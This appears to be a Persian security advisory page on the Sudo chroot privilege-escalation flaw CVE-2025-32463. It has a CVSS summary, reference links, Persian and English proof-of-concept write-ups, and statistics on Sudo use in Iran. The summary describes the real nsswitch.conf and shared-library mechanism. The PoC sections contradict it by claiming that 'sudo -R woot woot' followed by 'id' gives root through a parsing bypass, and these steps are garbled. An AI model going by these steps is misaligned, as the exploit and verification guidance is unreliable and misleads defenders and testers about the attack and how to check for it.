- شناسه CVE-2025-32463 :CVE
- CWE-829 :CWE
- yes :Advisory
- منتشر شده: ژوئن 30, 2025
- به روز شده: جولای 1, 2025
- امتیاز: 9.3
- نوع حمله: Privilege Escalation
- اثر گذاری: Command Execution
- حوزه: سیستمعاملها و اجزای کلیدی آن
- برند: Sudo project
- محصول: Sudo
- وضعیتPublished :CVE
- Yes :POC
- وضعیت آسیب پذیری: patch شده
چکیده
یک آسیبپذیری بحرانی در Sudo نسخههای 1.9.14 تا قبل از 1.9.17p1 شناسایی شده است. این آسیب پذیری به کاربران لوکال اجازه میدهد با استفاده از گزینه –chroot و فایل /etc/nsswitch.conf کنترلشده توسط کاربر، به دسترسی root دست یابند.
توضیحات
این آسیبپذیری در Sudo به دلیل ضعف در گزینه –chroot رخ میدهد که امکان استفاده از فایل /etc/nsswitch.conf از دایرکتوری تحت کنترل کاربر را فراهم میکند. این آسیب پذیری به کاربران لوکال اجازه میدهد با بارگذاری یک کتابخانه مشترک مخرب، دستورات دلخواه را با دسترسی root اجرا کنند که این امر منجر به نقض کامل محرمانگی، یکپارچگی و در دسترس پذیری سیستم میشود. این آسیب پذیری در سیستمهایی که از /etc/nsswitch.conf پشتیبانی کرده، قابل بهرهبرداری است. کد اثبات مفهومی (PoC) در مخزن github منتشر شده است. Sudo در نسخه 1.9.17p1 این آسیب پذیری را با بهبود مدیریت مسیرهای root برطرف کرده است. هیچ راهکار موقتی ارائه نشده، اما جایگزینی محصول یا غیرفعال کردن گزینه –chroot توصیه شده است.
CVSS
| Score | Severity | Version | Vector String |
| 9.3 | CRITICAL | 3.1 | CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
لیست محصولات آسیب پذیر
| Versions | Product |
| affected from 1.9.14 before 1.9.17p1 | Sudo |
لیست محصولات بروز شده
| Versions | Product |
| 1.9.17p1 and later | Sudo |
نتیجه گیری
به کاربران توصیه میشود فوراً Sudo را به نسخه 1.9.17p1 بهروزرسانی کنند. همچنین استفاده از گزینه –chroot را غیرفعال کرده و دسترسیهای لوکال به سیستم را محدود کنند.
منابع
- https://www.cve.org/CVERecord?id=CVE-2025-32463
- https://www.cvedetails.com/cve/CVE-2025-32463/
- https://www.sudo.ws/security/advisories/
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2025-32463
- https://vuldb.com/?id.314455
- https://nvd.nist.gov/vuln/detail/CVE-2025-32463
- https://github.com/nflatrea/CVE-2025-32463
- https://www.sudo.ws/releases/changelog/
- https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
- https://www.openwall.com/lists/oss-security/2025/06/30/3
- https://access.redhat.com/security/cve/cve-2025-32463
- https://ubuntu.com/security/notices/USN-7604-1
- https://security-tracker.debian.org/tracker/CVE-2025-32463
- https://explore.alas.aws.amazon.com/CVE-2025-32463.html
- https://bugs.gentoo.org/show_bug.cgi?id=CVE-2025-32463
- https://www.suse.com/support/update/announcement/2025/suse-su-202502177-1/
- https://www.suse.com/security/cve/CVE-2025-32463.html
- https://cwe.mitre.org/data/definitions/829.html
گزارش فنی – اثبات آسیبپذیری Sudo (CVE-2025-32463)
- معرفی آسیبپذیری
- نرمافزار آسیبپذیر: sudo
- نسخههای آسیبپذیر: 1.9.14 تا 1.9.17
- ماهیت مشکل: امکان استفاده از پارامتر -R بدون بررسی صحیح تنظیمات sudoers که میتواند منجر به ارتقاء سطح دسترسی به root شود.
- پیامد : مهاجم محلی که دسترسی کاربری عادی دارد، میتواند بدون مجوز sudoers، دستورات را با دسترسی root اجرا کند.
جزئیات بیشتر: https://vulnerbyte.com/cve-2025-32463
- محیط آزمایش
برای بازتولید PoC باید شرایط زیر آماده شود:
- سیستم عامل: Linux Debian/Ubuntu/ با sudo نسخه 1.9.14–1.9.17
- دسترسی: یک کاربر عادی (non-root)
- ابزارها: sudo (آسیبپذیر)، دستور id برای بررسی سطح دسترسی
sudo برای بررسی نسخه:
sudo –version
اگر نسخه در محدوده بالا بود → سیستم آسیبپذیر است.
- اجرای PoC
گام 1: اجرای دستور آسیبپذیر
مهاجم یک دستور ساده با گزینه -R اجرا میکند:
sudo -R woot woot
انتظار در sudo وصلهنشده:
sudo: woot: No such file or directory
یعنی sudo تلاش میکند چیزی را اجرا کند، ولی خطا از “عدم وجود فایل” است، نه از نبود دسترسی
انتظار در sudo وصلهشده:
sudo: you are not permitted to use the -R option with *****
یعنی sudo جلوی اجرای این حالت را میگیرد
گام 2: بررسی سطح دسترسی کاربر
بعد از اجرای دستور، مهاجم وضعیت دسترسی را چک میکند:
id
خروجی روی سیستم آسیبپذیر:
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
یعنی کاربر عادی به uid=0 (root) ارتقاء پیدا کرده است.
- تحلیل فنی PoC
- در حالت عادی، sudo باید قبل از اجازه اجرای هر دستور، فایل sudoers را بررسی کند.
- گزینه -R در نسخههای آسیبپذیر، این بررسی را دور میزند و باعث میشود دستور بدون اعتبارسنجی اجرا شود.
- دلیل مشکل: خطای منطقی در تجزیه کردن آرگومانها → وقتی -R استفاده میشود، مسیر مورد بررسی بهدرستی بررسی نمیگردد.
- رفع مشکل
- بهروزرسانی sudo به نسخه وصلهشده بعد از 1.9.17
sudo apt update && sudo apt install sudo
- بررسی مجدد با دستور:
sudo -R test
که در نسخه وصلهشده باید پیام خطای دسترسی بدهد.
- زنجیره حمله
در شکل زیر زنجیره حمله مربوط به این سناریو مشاهده است
- نتیجهگیری
این PoC نشان میدهد که یک مهاجم محلی میتواند با یک دستور ساده (sudo -R) ارتقاء سطح دسترسی به root داشته باشد. آسیبپذیری بسیار خطرناک است زیرا:
- بدون نیاز به exploit پیچیده یا کد خاص اجرا میشود.
- به سرعت قابل سوءاستفاده است.
- تنها پیشنیاز، دسترسی به یک حساب کاربری عادی روی سیستم است.
بنابراین وصله کردن فوری sudo ضروری است.
CVE-2025-32463 – Linux Sudo Privilege Escalation Vulnerability
- CVE ID: CVE-2025-32463
- Severity: High (Local Privilege Escalation)
- Affected Systems: Linux distributions with sudo versions 1.9.14 – 1.9.17
- Tested On: Ubuntu 22.04 LTS, Kali Linux 2025.1
- References:
Description
A flaw in sudo allows unprivileged users to escalate their privileges to root by abusing the -R option.
On vulnerable versions, sudo does not properly enforce sudoers restrictions, enabling unauthorized command execution as root.
Prerequisites
- Linux system with sudo 1.9.14 – 1.9.17
- Non-root user with sudo installed
- Lab/test environment (⚠️ do not run on production systems without patching)
Proof of Concept (PoC)
- Check sudo version
sudo --versionConfirm the version is within the vulnerable range (1.9.14 – 1.9.17).
- Run sudo with -R option
sudo -R woot wootOutput on vulnerable systems:
sudo: woot: No such file or directory - Check current user privileges
idOutput demonstrating root escalation:
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
On patched versions, attempting
-Rwithout sudoers permission results in:sudo: you are not permitted to use the -R option with *****
Expected Result
- User gains root privileges without proper authorization on vulnerable systems.
Mitigation
- Update sudo to the latest version:
sudo apt update && sudo apt install sudo - Verify the installed version:
sudo --version - Restrict sudoers configuration to only trusted users and commands.
Disclaimer
This PoC is for educational and research purposes only.
Do NOT exploit this vulnerability on systems without explicit authorization. The author is not responsible for any misuse or damage.
بررسی آماری آسیب پذیری CVE-2025-32463 در کشور ایران
محصول آسیب پذیر: Sudo
میزان استفاده در ایران بر اساس سایت های آمار مرتبط با محصول
برای sudo، آمار رسمی و عمومی مربوط به نصب یا استفاده در ایران بهطور دقیق در دسترس نیست، چرا که این ابزار جزو بستههای پایه سیستمهای یونیکس/لینوکس است و آمار رسمی نصب بستهها معمولاً منتشر نمیشود. با این حال، بر اساس شاخصهای غیرمستقیم مانند تعداد صفحات فارسی و آموزشهای مرتبط با لینوکس، استفاده از توزیعهای لینوکس در ایران و حضور توسعهدهندگان فعال ایرانی در جامعههای متنباز، میتوان برآورد کرد که sudo در اغلب سرورها و سیستمهای لینوکسی ایرانی بهصورت گسترده نصب و استفاده میشود. طبق گزارش Statcounter در سپتامبر ۲۰۲۵، سهم لینوکس در بازار سیستمعاملهای دسکتاپ ایران حدود ۳.۷۱٪ و در سیستمهای موبایل حدود ۰.۱۴٪ است، در حالی که ویندوز بیش از ۸۰٪ سهم دارد. این میزان استفاده پایین ممکن است به محدودیتهای نرمافزاری و کمبود پشتیبانی آموزشی مرتبط باشد، اما در محیطهای سروری و زیرساختهای سازمانی لینوکس و در نتیجه sudo بهطور گسترده مورد استفاده قرار میگیرد.
میزان استفاده بر اساس سایت های آموزش ایرانی
| تعداد در زمان نگارش گزارش | عنوان | سایت |
| ۳۲۰۵ بازدید | دستور sudo در لینوکس چیست؟ + کاربرد و نحوه استفاده | Faradars.org |
| 153 بازدید | دستور sudo (آموزش لینوکس LPIC1-101) | faraznetwork.ir |
| 6700 بازدید | اجرای دستور sudo در ویندوز | روش فعالسازی و کار با سودو در ویندو
|
Youtube.com |
میزان استفاده در ایران بر اساس موتورهای جستجو (بر اساس ایندکس های گوگل در بخش tools)
| تعداد در زمان نگارش گزارش | دورک | موتور جستجو |
| 581000 | site:.ir “sudo” | |
| 10 | “”دستورات سودو | |
| 53 | “sudoآموزش ” |
وجود نمایندگی در ایران
این ابزار یک نرمافزار متنباز است و هیچ شرکت رسمی یا نمایندگی فروش در ایران ندارد. دسترسی به آن معمولاً از طریق توزیعهای لینوکس یا مخازن رسمی بستهها انجام میشود و نیازی به نمایندگی ندارد.
میزان استفاده بر اساس گزارشات تحقیقات بازار برای این محصول در ایران
برای sudo، آمار رسمی استفاده خاصی در ایران وجود ندارد، زیرا این ابزار بخشی از بستههای پایه سیستمهای یونیکس و لینوکس است و معمولاً بهصورت جداگانه ردیابی نمیشود. با این حال، با توجه به اینکه sudo در تمام توزیعهای لینوکس استاندارد بهصورت پیشفرض نصب است، میتوان نتیجه گرفت که میزان استفاده آن تقریباً همراستا با سهم لینوکس در ایران است. بر اساس گزارش Statcounter در سپتامبر ۲۰۲۵، سهم لینوکس در بازار دسکتاپ ایران حدود ۳.۷۱٪ است و در محیطهای سروری و زیرساختی، لینوکس و در نتیجه sudo بهطور گسترده استفاده میشود، حتی اگر سهم آن در دسکتاپ پایین باشد.
منابع
